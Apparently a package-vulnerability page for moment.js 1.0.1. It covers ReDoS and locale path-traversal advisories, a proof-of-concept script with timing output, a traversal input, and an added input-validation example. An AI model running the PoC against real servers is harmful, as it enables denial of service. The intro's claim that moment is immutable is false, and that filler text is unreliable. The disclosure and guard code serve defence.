Moment.js is a ubiquitous JavaScript date library offering robust tools for date creation, manipulation, and formatting, all without modifying the native Date object. Version 1.0.1 refined the initial 1.0.0 release, though both shared identical metadata, including their release date timestamp. Both versions maintain a dependency-free architecture, showcasing the library's self-contained nature. Developers benefit from Moment.js's consistent API for handling dates in various formats, simplifying tasks such as parsing, validating, adding, subtracting, and displaying dates in user-friendly ways.
The core strength lies in its immutability and chainable methods, leading to cleaner and more maintainable code when working with dates. While the jump from 1.0.0 to 1.0.1 might seem minor, such point releases often contain crucial bug fixes and performance improvements.
For developers choosing between these two versions, 1.0.1 is the better choice, assuming it addresses issues found in the original 1.0.0 release. Both versions provide Moment.js's extensive localization support, enabling the display of dates and times in different languages and formats, which makes the library attractive for global applications. Its enduring popularity reflects how effectively it tames the complexities of date and time manipulation in JavaScript.
All vulnerabilities affecting version 1.0.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');

// Build a string of len + 1 copies of chr (the loop bound is inclusive).
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// i is never declared, so both loops share one global; that is why the
// COUNT values in the output below advance by 10001 rather than 10000.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');   // a minus sign followed by i + 1 digits
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);             // parse time grows superlinearly with length
  var end = process.hrtime(start);
  console.log(end);                 // [seconds, nanoseconds]
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is used directly to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
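As an added example (not part of this advisory page or of the moment.js project), the two guards below show how a server can validate untrusted input before it reaches moment.locale() or moment.duration(): an allowlist for locale names, which rejects path-like values such as dir/../../filename, and a length cap plus a bounded ISO 8601 shape check for duration strings, which rejects the multi-kilobyte digit strings used in the PoC above. The locale allowlist and the request-object names are assumptions for this example; moment itself is not loaded.

```javascript
// Added example, not part of the advisory or of moment.js: two input guards
// applied before untrusted strings reach moment.locale() or moment.duration().

// Constructed allowlist for this example; in practice build it from the
// locales the application actually bundles (e.g. from moment.locales()).
const ALLOWED_LOCALES = new Set(['en', 'en-gb', 'fr', 'de', 'zh-cn']);

// moment locale names are short lowercase tags such as "fr" or "en-gb".
// Bounded character classes: no '/', '\', or '.' can ever pass this check.
const LOCALE_SHAPE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8}){0,2}$/;

// Returns a locale name that is safe to pass to moment.locale(), or the fallback.
function safeLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const name = input.trim().toLowerCase();
  if (!LOCALE_SHAPE.test(name)) return fallback;   // rejects 'dir/../../filename'
  return ALLOWED_LOCALES.has(name) ? name : fallback;
}

// The PoC above pushes tens of thousands of digits through moment.duration().
// Cap the length first, then accept only a bounded ISO 8601 duration subset
// (PnYnMnWnDTnHnMnS). Every quantifier is bounded and no alternatives overlap,
// so this check runs in linear time on any input.
const MAX_DURATION_LEN = 64;
const DURATION_SHAPE = new RegExp(
  '^-?P(?:\\d{1,4}Y)?(?:\\d{1,4}M)?(?:\\d{1,4}W)?(?:\\d{1,4}D)?' +
  '(?:T(?:\\d{1,4}H)?(?:\\d{1,4}M)?(?:\\d{1,4}(?:\\.\\d{1,3})?S)?)?$'
);

// Returns { ok: true, value } for an acceptable duration string, or
// { ok: false, reason } without ever calling moment.duration().
function validateDuration(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length > MAX_DURATION_LEN) return { ok: false, reason: 'too long' };
  if (!DURATION_SHAPE.test(input)) return { ok: false, reason: 'bad shape' };
  if (!/\d/.test(input)) return { ok: false, reason: 'empty duration' }; // 'P' or 'PT'
  return { ok: true, value: input };
}

// Usage sketch with a hypothetical request object (names are assumptions):
// const locale = safeLocale(req.query.lang);
// const dur = validateDuration(req.query.duration);
// if (dur.ok) moment.duration(dur.value); else respond400(dur.reason);
```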